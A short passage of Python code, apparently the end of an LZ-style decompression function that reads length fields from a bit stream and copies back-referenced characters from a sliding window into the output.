                        lenField = reader.getBits(4)
                        lenCounter += 1
                    length = 15 * lenCounter + 8 + lenField
            for i in range(length):
                char = window[-offset]
                result += chr(char)
                window.append(char)

    return result, window
